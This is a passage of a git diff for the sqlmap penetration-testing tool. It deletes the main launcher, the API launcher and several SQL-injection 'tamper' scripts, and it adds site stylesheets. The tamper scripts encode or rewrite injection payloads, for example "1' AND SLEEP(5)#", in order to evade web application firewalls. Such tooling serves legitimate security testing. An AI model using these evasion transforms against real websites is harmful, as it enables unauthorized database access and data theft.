-# Valid: integer between 0 and 6 -# 0: Show only error and critical messages -# 1: Show also warning and info messages -# 2: Show also debug messages -# 3: Show also payloads injected -# 4: Show also HTTP requests -# 5: Show also HTTP responses' headers -# 6: Show also HTTP responses' page content -# Default: 1 -verbose = 1 diff --git a/sqlmap.py b/sqlmap.py deleted file mode 100755 index 82aa64df..00000000 --- a/sqlmap.py +++ /dev/null @@ -1,252 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import sys - -sys.dont_write_bytecode = True - -from lib.utils import versioncheck # this has to be the first non-standard import - -import bdb -import inspect -import logging -import os -import re -import shutil -import sys -import thread -import time -import traceback -import warnings - -warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) -warnings.filterwarnings(action="ignore", category=DeprecationWarning) - -from lib.controller.controller import start -from lib.core.common import banner -from lib.core.common import createGithubIssue -from lib.core.common import dataToStdout -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import maskSensitiveData -from lib.core.common import setPaths -from lib.core.common import weAreFrozen -from lib.core.data import cmdLineOptions -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.common import unhandledExceptionMessage -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapShellQuitException -from lib.core.exception import SqlmapSilentQuitException -from lib.core.exception import SqlmapUserQuitException -from lib.core.option import initOptions -from lib.core.option import init -from 
lib.core.profiling import profile -from lib.core.settings import LEGAL_DISCLAIMER -from lib.core.testing import smokeTest -from lib.core.testing import liveTest -from lib.parse.cmdline import cmdLineParser -from lib.utils.api import setRestAPILog -from lib.utils.api import StdDbOut - -def modulePath(): - """ - This will get us the program's directory, even if we are frozen - using py2exe - """ - - try: - _ = sys.executable if weAreFrozen() else __file__ - except NameError: - _ = inspect.getsourcefile(modulePath) - - return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding()) - -def main(): - """ - Main function of sqlmap when running from command line. - """ - - try: - paths.SQLMAP_ROOT_PATH = modulePath() - - try: - os.path.isdir(paths.SQLMAP_ROOT_PATH) - except UnicodeEncodeError: - errMsg = "your system does not properly handle non-ASCII paths. " - errMsg += "Please move the sqlmap's directory to the other location" - logger.error(errMsg) - raise SystemExit - - setPaths() - - # Store original command line options for possible later restoration - cmdLineOptions.update(cmdLineParser().__dict__) - initOptions(cmdLineOptions) - - if hasattr(conf, "api"): - # Overwrite system standard output and standard error to write - # to an IPC database - sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") - sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") - setRestAPILog() - - banner() - - conf.showTime = True - dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) - dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) - - init() - - if conf.profile: - profile() - elif conf.smokeTest: - smokeTest() - elif conf.liveTest: - liveTest() - else: - try: - start() - except thread.error as ex: - if "can't start new thread" in getSafeExString(ex): - errMsg = "unable to start new threads. 
Please check OS (u)limits" - logger.critical(errMsg) - raise SystemExit - else: - raise - - except SqlmapUserQuitException: - errMsg = "user quit" - try: - logger.error(errMsg) - except KeyboardInterrupt: - pass - - except (SqlmapSilentQuitException, bdb.BdbQuit): - pass - - except SqlmapShellQuitException: - cmdLineOptions.sqlmapShell = False - - except SqlmapBaseException as ex: - errMsg = getSafeExString(ex) - try: - logger.critical(errMsg) - except KeyboardInterrupt: - pass - raise SystemExit - - except KeyboardInterrupt: - print - - errMsg = "user aborted" - try: - logger.error(errMsg) - except KeyboardInterrupt: - pass - - except EOFError: - print - errMsg = "exit" - - try: - logger.error(errMsg) - except KeyboardInterrupt: - pass - - except SystemExit: - pass - - except: - print - errMsg = unhandledExceptionMessage() - excMsg = traceback.format_exc() - - try: - if any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): - errMsg = "no space left on output device" - logger.error(errMsg) - raise SystemExit - - elif "_mkstemp_inner" in excMsg: - errMsg = "there has been a problem while accessing temporary files" - logger.error(errMsg) - raise SystemExit - - elif all(_ in excMsg for _ in ("pymysql", "configparser")): - errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" - logger.error(errMsg) - raise SystemExit - - elif "bad marshal data (unknown type code)" in excMsg: - match = re.search(r"\s*(.+)\s+ValueError", excMsg) - errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") - errMsg += ". 
Please delete .pyc files on your system to fix the problem" - logger.error(errMsg) - raise SystemExit - - for match in re.finditer(r'File "(.+?)", line', excMsg): - file_ = match.group(1) - file_ = os.path.relpath(file_, os.path.dirname(__file__)) - file_ = file_.replace("\\", '/') - file_ = re.sub(r"\.\./", '/', file_).lstrip('/') - excMsg = excMsg.replace(match.group(1), file_) - - errMsg = maskSensitiveData(errMsg) - excMsg = maskSensitiveData(excMsg) - - if hasattr(conf, "api"): - logger.critical("%s\n%s" % (errMsg, excMsg)) - else: - logger.critical(errMsg) - kb.stickyLevel = logging.CRITICAL - dataToStdout(excMsg) - createGithubIssue(errMsg, excMsg) - - except KeyboardInterrupt: - pass - - finally: - kb.threadContinue = False - kb.threadException = True - - if conf.get("showTime"): - dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) - - if kb.get("tempDir"): - shutil.rmtree(kb.tempDir, ignore_errors=True) - - if conf.get("hashDB"): - try: - conf.hashDB.flush(True) - except KeyboardInterrupt: - pass - - if cmdLineOptions.get("sqlmapShell"): - cmdLineOptions.clear() - conf.clear() - kb.clear() - main() - - if hasattr(conf, "api"): - try: - conf.database_cursor.disconnect() - except KeyboardInterrupt: - pass - - if conf.get("dumper"): - conf.dumper.flush() - - # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program - if conf.get("threads", 0) > 1 or conf.get("dnsServer"): - os._exit(0) - -if __name__ == "__main__": - main() diff --git a/sqlmapapi.py b/sqlmapapi.py deleted file mode 100755 index 7aa369f5..00000000 --- a/sqlmapapi.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import logging -import optparse -import sys - -sys.dont_write_bytecode = True - -from lib.utils import versioncheck # this has to be the first non-standard import - -from sqlmap 
import modulePath -from lib.core.common import setPaths -from lib.core.data import paths -from lib.core.data import logger -from lib.core.settings import RESTAPI_DEFAULT_ADAPTER -from lib.core.settings import RESTAPI_DEFAULT_ADDRESS -from lib.core.settings import RESTAPI_DEFAULT_PORT -from lib.utils.api import client -from lib.utils.api import server - -def main(): - """ - REST-JSON API main function - """ - - # Set default logging level to debug - logger.setLevel(logging.DEBUG) - - # Initialize path variable - paths.SQLMAP_ROOT_PATH = modulePath() - setPaths() - - # Parse command line options - apiparser = optparse.OptionParser() - apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true") - apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true") - apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server", default=RESTAPI_DEFAULT_ADDRESS, action="store") - apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server", default=RESTAPI_DEFAULT_PORT, type="int", action="store") - apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default %s)" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store") - (args, _) = apiparser.parse_args() - - # Start the client or the server - if args.server is True: - server(args.host, args.port, adapter=args.adapter) - elif args.client is True: - client(args.host, args.port) - else: - apiparser.print_help() - -if __name__ == "__main__": - main() diff --git a/stylesheets/print.css b/stylesheets/print.css new file mode 100644 index 00000000..541695bf --- /dev/null +++ b/stylesheets/print.css @@ -0,0 +1,226 @@ +html, body, div, span, applet, object, iframe, +h1, h2, h3, h4, h5, h6, p, blockquote, pre, +a, abbr, acronym, address, big, cite, code, +del, dfn, em, img, ins, kbd, q, s, samp, +small, strike, strong, sub, sup, tt, 
var, +b, u, i, center, +dl, dt, dd, ol, ul, li, +fieldset, form, label, legend, +table, caption, tbody, tfoot, thead, tr, th, td, +article, aside, canvas, details, embed, +figure, figcaption, footer, header, hgroup, +menu, nav, output, ruby, section, summary, +time, mark, audio, video { + margin: 0; + padding: 0; + border: 0; + font-size: 100%; + font: inherit; + vertical-align: baseline; +} +/* HTML5 display-role reset for older browsers */ +article, aside, details, figcaption, figure, +footer, header, hgroup, menu, nav, section { + display: block; +} +body { + line-height: 1; +} +ol, ul { + list-style: none; +} +blockquote, q { + quotes: none; +} +blockquote:before, blockquote:after, +q:before, q:after { + content: ''; + content: none; +} +table { + border-collapse: collapse; + border-spacing: 0; +} +body { + font-size: 13px; + line-height: 1.5; + font-family: 'Helvetica Neue', Helvetica, Arial, serif; + color: #000; +} + +a { + color: #d5000d; + font-weight: bold; +} + +header { + padding-top: 35px; + padding-bottom: 10px; +} + +header h1 { + font-weight: bold; + letter-spacing: -1px; + font-size: 48px; + color: #303030; + line-height: 1.2; +} + +header h2 { + letter-spacing: -1px; + font-size: 24px; + color: #aaa; + font-weight: normal; + line-height: 1.3; +} +#downloads { + display: none; +} +#main_content { + padding-top: 20px; +} + +code, pre { + font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal; + color: #222; + margin-bottom: 30px; + font-size: 12px; +} + +code { + padding: 0 3px; +} + +pre { + border: solid 1px #ddd; + padding: 20px; + overflow: auto; +} +pre code { + padding: 0; +} + +ul, ol, dl { + margin-bottom: 20px; +} + + +/* COMMON STYLES */ + +table { + width: 100%; + border: 1px solid #ebebeb; +} + +th { + font-weight: 500; +} + +td { + border: 1px solid #ebebeb; + text-align: center; + font-weight: 300; +} + +form { + background: #f2f2f2; + padding: 20px; + +} + + +/* GENERAL ELEMENT TYPE STYLES */ + +h1 { + font-size: 
2.8em; +} + +h2 { + font-size: 22px; + font-weight: bold; + color: #303030; + margin-bottom: 8px; +} + +h3 { + color: #d5000d; + font-size: 18px; + font-weight: bold; + margin-bottom: 8px; +} + +h4 { + font-size: 16px; + color: #303030; + font-weight: bold; +} + +h5 { + font-size: 1em; + color: #303030; +} + +h6 { + font-size: .8em; + color: #303030; +} + +p { + font-weight: 300; + margin-bottom: 20px; +} + +a { + text-decoration: none; +} + +p a { + font-weight: 400; +} + +blockquote { + font-size: 1.6em; + border-left: 10px solid #e9e9e9; + margin-bottom: 20px; + padding: 0 0 0 30px; +} + +ul li { + list-style: disc inside; + padding-left: 20px; +} + +ol li { + list-style: decimal inside; + padding-left: 3px; +} + +dl dd { + font-style: italic; + font-weight: 100; +} + +footer { + margin-top: 40px; + padding-top: 20px; + padding-bottom: 30px; + font-size: 13px; + color: #aaa; +} + +footer a { + color: #666; +} + +/* MISC */ +.clearfix:after { + clear: both; + content: '.'; + display: block; + visibility: hidden; + height: 0; +} + +.clearfix {display: inline-block;} +* html .clearfix {height: 1%;} +.clearfix {display: block;} \ No newline at end of file diff --git a/stylesheets/pygment_trac.css b/stylesheets/pygment_trac.css new file mode 100644 index 00000000..c6a6452d --- /dev/null +++ b/stylesheets/pygment_trac.css @@ -0,0 +1,69 @@ +.highlight { background: #ffffff; } +.highlight .c { color: #999988; font-style: italic } /* Comment */ +.highlight .err { color: #a61717; background-color: #e3d2d2 } /* Error */ +.highlight .k { font-weight: bold } /* Keyword */ +.highlight .o { font-weight: bold } /* Operator */ +.highlight .cm { color: #999988; font-style: italic } /* Comment.Multiline */ +.highlight .cp { color: #999999; font-weight: bold } /* Comment.Preproc */ +.highlight .c1 { color: #999988; font-style: italic } /* Comment.Single */ +.highlight .cs { color: #999999; font-weight: bold; font-style: italic } /* Comment.Special */ +.highlight .gd { color: 
#000000; background-color: #ffdddd } /* Generic.Deleted */ +.highlight .gd .x { color: #000000; background-color: #ffaaaa } /* Generic.Deleted.Specific */ +.highlight .ge { font-style: italic } /* Generic.Emph */ +.highlight .gr { color: #aa0000 } /* Generic.Error */ +.highlight .gh { color: #999999 } /* Generic.Heading */ +.highlight .gi { color: #000000; background-color: #ddffdd } /* Generic.Inserted */ +.highlight .gi .x { color: #000000; background-color: #aaffaa } /* Generic.Inserted.Specific */ +.highlight .go { color: #888888 } /* Generic.Output */ +.highlight .gp { color: #555555 } /* Generic.Prompt */ +.highlight .gs { font-weight: bold } /* Generic.Strong */ +.highlight .gu { color: #800080; font-weight: bold; } /* Generic.Subheading */ +.highlight .gt { color: #aa0000 } /* Generic.Traceback */ +.highlight .kc { font-weight: bold } /* Keyword.Constant */ +.highlight .kd { font-weight: bold } /* Keyword.Declaration */ +.highlight .kn { font-weight: bold } /* Keyword.Namespace */ +.highlight .kp { font-weight: bold } /* Keyword.Pseudo */ +.highlight .kr { font-weight: bold } /* Keyword.Reserved */ +.highlight .kt { color: #445588; font-weight: bold } /* Keyword.Type */ +.highlight .m { color: #009999 } /* Literal.Number */ +.highlight .s { color: #d14 } /* Literal.String */ +.highlight .na { color: #008080 } /* Name.Attribute */ +.highlight .nb { color: #0086B3 } /* Name.Builtin */ +.highlight .nc { color: #445588; font-weight: bold } /* Name.Class */ +.highlight .no { color: #008080 } /* Name.Constant */ +.highlight .ni { color: #800080 } /* Name.Entity */ +.highlight .ne { color: #990000; font-weight: bold } /* Name.Exception */ +.highlight .nf { color: #990000; font-weight: bold } /* Name.Function */ +.highlight .nn { color: #555555 } /* Name.Namespace */ +.highlight .nt { color: #000080 } /* Name.Tag */ +.highlight .nv { color: #008080 } /* Name.Variable */ +.highlight .ow { font-weight: bold } /* Operator.Word */ +.highlight .w { color: #bbbbbb } /* 
Text.Whitespace */ +.highlight .mf { color: #009999 } /* Literal.Number.Float */ +.highlight .mh { color: #009999 } /* Literal.Number.Hex */ +.highlight .mi { color: #009999 } /* Literal.Number.Integer */ +.highlight .mo { color: #009999 } /* Literal.Number.Oct */ +.highlight .sb { color: #d14 } /* Literal.String.Backtick */ +.highlight .sc { color: #d14 } /* Literal.String.Char */ +.highlight .sd { color: #d14 } /* Literal.String.Doc */ +.highlight .s2 { color: #d14 } /* Literal.String.Double */ +.highlight .se { color: #d14 } /* Literal.String.Escape */ +.highlight .sh { color: #d14 } /* Literal.String.Heredoc */ +.highlight .si { color: #d14 } /* Literal.String.Interpol */ +.highlight .sx { color: #d14 } /* Literal.String.Other */ +.highlight .sr { color: #009926 } /* Literal.String.Regex */ +.highlight .s1 { color: #d14 } /* Literal.String.Single */ +.highlight .ss { color: #990073 } /* Literal.String.Symbol */ +.highlight .bp { color: #999999 } /* Name.Builtin.Pseudo */ +.highlight .vc { color: #008080 } /* Name.Variable.Class */ +.highlight .vg { color: #008080 } /* Name.Variable.Global */ +.highlight .vi { color: #008080 } /* Name.Variable.Instance */ +.highlight .il { color: #009999 } /* Literal.Number.Integer.Long */ + +.type-csharp .highlight .k { color: #0000FF } +.type-csharp .highlight .kt { color: #0000FF } +.type-csharp .highlight .nf { color: #000000; font-weight: normal } +.type-csharp .highlight .nc { color: #2B91AF } +.type-csharp .highlight .nn { color: #000000 } +.type-csharp .highlight .s { color: #A31515 } +.type-csharp .highlight .sc { color: #A31515 } diff --git a/stylesheets/stylesheet.css b/stylesheets/stylesheet.css new file mode 100644 index 00000000..63d38e03 --- /dev/null +++ b/stylesheets/stylesheet.css @@ -0,0 +1,491 @@ +/* http://meyerweb.com/eric/tools/css/reset/ + v2.0 | 20110126 + License: none (public domain) +*/ +html, body, div, span, applet, object, iframe, +h1, h2, h3, h4, h5, h6, p, blockquote, pre, +a, abbr, acronym, 
address, big, cite, code, +del, dfn, em, img, ins, kbd, q, s, samp, +small, strike, sub, sup, tt, var, +b, u, i, center, +dl, dt, dd, ol, ul, li, +fieldset, form, label, legend, +table, caption, tbody, tfoot, thead, tr, th, td, +article, aside, canvas, details, embed, +figure, figcaption, footer, header, hgroup, +menu, nav, output, ruby, section, summary, +time, mark, audio, video { + margin: 0; + padding: 0; + border: 0; + font-size: 100%; + font: inherit; + vertical-align: baseline; +} +/* HTML5 display-role reset for older browsers */ +article, aside, details, figcaption, figure, +footer, header, hgroup, menu, nav, section { + display: block; +} +body { + line-height: 1; + text-align: justify; +} +ol, ul { + list-style: none; +} +blockquote, q { + quotes: none; +} +blockquote:before, blockquote:after, +q:before, q:after { + content: ''; + content: none; +} +table { + border-collapse: collapse; + border-spacing: 0; +} + +/* LAYOUT STYLES */ +body { + font-size: 15px; + line-height: 1.5; + background: #fafafa url(../images/body-bg.jpg) 0 0 repeat; + font-family: 'Helvetica Neue', Helvetica, Arial, serif; + font-weight: 400; + color: #666; +} + +a { + color: #2879d0; +} +a:hover { + color: #2268b2; +} + +header { + padding-top: 40px; + padding-bottom: 40px; + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + background: #2e7bcf url(../images/header-bg.jpg) 0 0 repeat-x; + border-bottom: solid 1px #275da1; +} + +header h1 { + letter-spacing: -1px; + font-size: 72px; + color: #fff; + line-height: 1; + margin-bottom: 0.2em; + width: 540px; +} + +header h2 { + font-size: 26px; + color: #9ddcff; + font-weight: normal; + line-height: 1.3; + width: 540px; + letter-spacing: 0; +} + +.inner { + position: relative; + width: 940px; + margin: 0 auto; +} + +#content-wrapper { + border-top: solid 1px #fff; + padding-top: 30px; +} + +#main-content { + width: 690px; + float: left; +} + +#main-content img { + max-width: 100%; +} + +aside#sidebar { + 
width: 200px; + padding-left: 20px; + min-height: 504px; + float: right; + background: transparent url(../images/sidebar-bg.jpg) 0 0 no-repeat; + font-size: 12px; + line-height: 1.3; +} + +aside#sidebar p.repo-owner, +aside#sidebar p.repo-owner a { + font-weight: bold; +} + +#downloads { + margin-bottom: 40px; +} + +a.button { + width: 134px; + height: 58px; + line-height: 1.2; + font-size: 23px; + color: #fff; + padding-left: 68px; + padding-top: 22px; + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; +} +a.button small { + display: block; + font-size: 11px; +} +header a.button { + position: absolute; + right: 0; + top: 0; + background: transparent url(../images/github-button.png) 0 0 no-repeat; +} +aside a.button { + width: 138px; + padding-left: 64px; + display: block; + background: transparent url(../images/download-button.png) 0 0 no-repeat; + margin-bottom: 20px; + font-size: 21px; +} + +code, pre { + font-family: monospace, serif; + _font-family: 'courier new', monospace; + color: #222; + font-size: 13px; +} + +code { + background-color: #f2f8fc; + border: solid 1px #dbe7f3; + padding: 0 3px; +} + +pre { + padding: 20px; + background: #fff; + text-shadow: none; + overflow: auto; + border: solid 1px #f2f2f2; +} +pre code { + color: #2879d0; + background-color: #fff; + border: none; + padding: 0; +} + +ul, ol, dl { + margin-bottom: 20px; +} + + +/* COMMON STYLES */ + +hr { + height: 1px; + line-height: 1px; + margin-top: 1em; + padding-bottom: 1em; + border: none; + background: transparent url('../images/hr.png') 0 0 no-repeat; +} + +table { + width: 100%; + border: 1px solid #ebebeb; +} + +th { + font-weight: 500; +} + +td { + border: 1px solid #ebebeb; + text-align: center; + font-weight: 300; +} + +form { + background: #f2f2f2; + padding: 20px; + +} + + +/* GENERAL ELEMENT TYPE STYLES */ + +#main-content h1 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: 2.8em; + letter-spacing: 
-1px; + color: #474747; +} + +#main-content h1:before { + content: "';"; + color: #ff2020; + padding-right: 0.3em; + margin-left: -0.9em; +} + +#main-content h1:after { + content: "();--"; + color: #ff2020; + padding-left: 0.1em; + margin-right: -0.9em; +} + +#main-content h2 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: 22px; + font-weight: bold; + margin-bottom: 8px; + color: #474747; +} +#main-content h2:before { + content: "//"; + color: #9ddcff; + padding-right: 0.3em; + margin-left: -1.5em; +} + +#main-content h3 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: 18px; + font-weight: bold; + margin-top: 24px; + margin-bottom: 8px; + color: #474747; +} + +#main-content h3:before { + content: "///"; + color: #9ddcff; + padding-right: 0.3em; + margin-left: -2em; +} + +#main-content h4 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: 15px; + font-weight: bold; + color: #474747; +} + +h4:before { + content: "////"; + color: #9ddcff; + padding-right: 0.3em; + margin-left: -2.8em; +} + +#main-content h5 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: 14px; + color: #474747; +} +h5:before { + content: "/////"; + color: #9ddcff; + padding-right: 0.3em; + margin-left: -3.2em; +} + +#main-content h6 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: .8em; + color: #474747; +} +h6:before { + content: "//////"; + color: #9ddcff; + padding-right: 0.3em; + margin-left: -3.7em; +} + +p { + margin-bottom: 20px; +} + +a { + text-decoration: none; +} + +p a { + font-weight: 400; +} + +blockquote { + font-size: 1.6em; + border-left: 10px solid #e9e9e9; + margin-bottom: 20px; + padding: 0 0 0 30px; +} + +ul li { + list-style: disc inside; +/* padding-left: 20px; */ +} + +ol li { + list-style: decimal inside; +/* padding-left: 3px; */ +} + +dl dd { + 
font-style: italic; + font-weight: 100; +} + +footer { + background: transparent url('../images/hr.png') 0 0 no-repeat; + margin-top: 40px; + padding-top: 20px; + padding-bottom: 30px; + font-size: 13px; + color: #aaa; +} + +footer a { + color: #666; +} +footer a:hover { + color: #444; +} + +/* MISC */ +.clearfix:after { + clear: both; + content: '.'; + display: block; + visibility: hidden; + height: 0; +} + +.clearfix {display: inline-block;} +* html .clearfix {height: 1%;} +.clearfix {display: block;} + +/* #Media Queries +================================================== */ + +/* Smaller than standard 960 (devices and browsers) */ +@media only screen and (max-width: 959px) {} + +/* Tablet Portrait size to standard 960 (devices and browsers) */ +@media only screen and (min-width: 768px) and (max-width: 959px) { + .inner { + width: 740px; + } + header h1, header h2 { + width: 340px; + } + header h1 { + font-size: 60px; + } + header h2 { + font-size: 30px; + } + #main-content { + width: 490px; + } + #main-content h1:before, + #main-content h2:before, + #main-content h3:before, + #main-content h4:before, + #main-content h5:before, + #main-content h6:before { + content: none; + padding-right: 0; + margin-left: 0; + } +} + +/* All Mobile Sizes (devices and browser) */ +@media only screen and (max-width: 767px) { + .inner { + width: 93%; + } + header { + padding: 20px 0; + } + header .inner { + position: relative; + } + header h1, header h2 { + width: 100%; + } + header h1 { + font-size: 48px; + } + header h2 { + font-size: 24px; + } + header a.button { + background-image: none; + width: auto; + height: auto; + display: inline-block; + margin-top: 15px; + padding: 5px 10px; + position: relative; + text-align: center; + font-size: 13px; + line-height: 1; + background-color: #9ddcff; + color: #2879d0; + -moz-border-radius: 5px; + -webkit-border-radius: 5px; + border-radius: 5px; + } + header a.button small { + font-size: 13px; + display: inline; + } + #main-content, + 
aside#sidebar { + float: none; + width: 100% ! important; + } + aside#sidebar { + background-image: none; + margin-top: 20px; + border-top: solid 1px #ddd; + padding: 20px 0; + min-height: 0; + } + aside#sidebar a.button { + display: none; + } + aside#sidebar div#timeline { + display: none; + } + #main-content h1:before, + #main-content h1:after, + #main-content h2:before, + #main-content h3:before, + #main-content h4:before, + #main-content h5:before, + #main-content h6:before { + content: none; + padding-right: 0; + margin-left: 0; + } +} + +/* Mobile Landscape Size to Tablet Portrait (devices and browsers) */ +@media only screen and (min-width: 480px) and (max-width: 767px) {} + +/* Mobile Portrait Size to Mobile Landscape Size (devices and browsers) */ +@media only screen and (max-width: 479px) {} diff --git a/tamper/__init__.py b/tamper/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/tamper/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py deleted file mode 100644 index 1fa66457..00000000 --- a/tamper/apostrophemask.py +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces apostrophe character with its UTF-8 full width counterpart - - References: - * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 - * http://lukasz.pilorz.net/testy/unicode_conversion/ - * http://sla.ckers.org/forum/read.php?13,11562,11850 - * http://lukasz.pilorz.net/testy/full_width_utf/index.phps - - >>> tamper("1 AND '1'='1") - '1 AND 
%EF%BC%871%EF%BC%87=%EF%BC%871' - """ - - return payload.replace('\'', "%EF%BC%87") if payload else payload diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py deleted file mode 100644 index 5d01f824..00000000 --- a/tamper/apostrophenullencode.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces apostrophe character with its illegal double unicode counterpart - - >>> tamper("1 AND '1'='1") - '1 AND %00%271%00%27=%00%271' - """ - - return payload.replace('\'', "%00%27") if payload else payload diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py deleted file mode 100644 index 2694b98b..00000000 --- a/tamper/appendnullbyte.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Appends encoded NULL byte character at the end of payload - - Requirement: - * Microsoft Access - - Notes: - * Useful to bypass weak web application firewalls when the back-end - database management system is Microsoft Access - further uses are - also possible - - Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection - - >>> tamper('1 AND 1=1') - '1 AND 1=1%00' - """ - - return "%s%%00" % payload if payload else payload diff --git a/tamper/base64encode.py b/tamper/base64encode.py deleted file mode 100644 index 6dbdc9c7..00000000 --- a/tamper/base64encode.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See 
the file 'doc/COPYING' for copying permission -""" - -import base64 - -from lib.core.enums import PRIORITY -from lib.core.settings import UNICODE_ENCODING - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Base64 all characters in a given payload - - >>> tamper("1' AND SLEEP(5)#") - 'MScgQU5EIFNMRUVQKDUpIw==' - """ - - return base64.b64encode(payload.encode(UNICODE_ENCODING)) if payload else payload diff --git a/tamper/between.py b/tamper/between.py deleted file mode 100644 index 620ba435..00000000 --- a/tamper/between.py +++ /dev/null @@ -1,59 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' - Replaces equals operator ('=') with 'BETWEEN # AND #' - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The BETWEEN clause is SQL standard. Hence, this tamper script - should work against all (?) 
databases - - >>> tamper('1 AND A > B--') - '1 AND A NOT BETWEEN 0 AND B--' - >>> tamper('1 AND A = B--') - '1 AND A BETWEEN B AND B--' - """ - - retVal = payload - - if payload: - match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) - - if match: - _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) - retVal = retVal.replace(match.group(0), _) - else: - retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", " NOT BETWEEN 0 AND \g<1>", payload) - - if retVal == payload: - match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*(\w+)\s*", payload) - - if match: - _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) - retVal = retVal.replace(match.group(0), _) - - - return retVal diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py deleted file mode 100644 index 92d4eea4..00000000 --- a/tamper/bluecoat.py +++ /dev/null @@ -1,51 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces space character after SQL statement with a valid random blank character. 
